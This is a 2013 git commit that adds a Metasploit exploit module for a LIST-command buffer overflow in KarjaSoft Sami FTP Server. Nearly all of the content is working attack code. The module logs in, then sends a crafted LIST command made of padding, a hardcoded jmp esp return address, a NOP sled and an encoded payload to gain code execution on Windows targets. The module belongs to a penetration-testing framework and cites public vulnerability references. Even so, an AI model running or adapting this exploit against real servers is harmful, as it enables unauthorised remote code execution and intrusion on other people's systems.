got sami_ftpd_list.rb working

2013-03-13 17:27:02 -04:00 · 2013-03-13 17:27:02 -04:00 · fa5c988110
parent 22133ba8ff
commit fa5c988110
1 changed files with 79 additions and 0 deletions
--- a/modules/exploits/windows/ftp/sami_ftpd_list.rb
+++ b/modules/exploits/windows/ftp/sami_ftpd_list.rb
@ -0,0 +1,79 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::Tcp
+	#include Msf::Exploit::Remote::Seh
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'		=> 'KarjaSoft Sami FTP Server LIST Overflow',
+			'Description'	=> %q{
+                A buffer overflow is triggered when a long LIST command is sent to the
+                server and the user views the Log tab.
+			},
+			'Author'	=> [ 'Doug Prostko <dougtko[at]gmail.com>' ],
+			'License'	=> MSF_LICENSE,
+			'References'	=>
+				[
+					[ 'OSVDB', '90815'],
+					[ 'EDB', '24557'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Platform' 	=> ['win'],
+			'Privileged'	=> false,
+			'Payload'	=>
+				{
+					'Space'			=> 950,
+					'BadChars'		=> "\x00\x0a\x0d\x20\xff",
+                    #'StackAdjustment' => -3500,
+				},
+			'Targets' 	=>
+				[
+                   [ 'Universal', { 'Ret' => 0x10028283 } ], # jmp esp
+				],
+			'DisclosureDate' => 'Feb 27 2013'))
+
+		register_options(
+			[
+				Opt::RPORT(21),
+                OptString.new('FTPUSER', [ true, 'Valid FTP username', 'ftp' ]),
+                OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'ftp' ])
+			], self.class)
+	end
+
+	def exploit
+		connect
+
+        buf = rand_text_alphanumeric(219)
+        buf << [target.ret].pack("V")
+        buf << make_nops(50) + payload.encoded
+        sock.put("USER #{datastore['FTPUSER']}\r\n")
+        sock.put("PASS #{datastore['FTPPASS']}\r\n")
+        res = sock.get(-1,3)
+        if(res.match(/230 Access allowed\./))
+           print_good("Login successful")
+        else
+            print_status("Bad username/password")
+        end
+        sleep 1
+
+        print_status("Sending evil LIST command")
+        sock.put("LIST #{buf}\r\n")
+
+		handler
+		disconnect
+	end
+
+end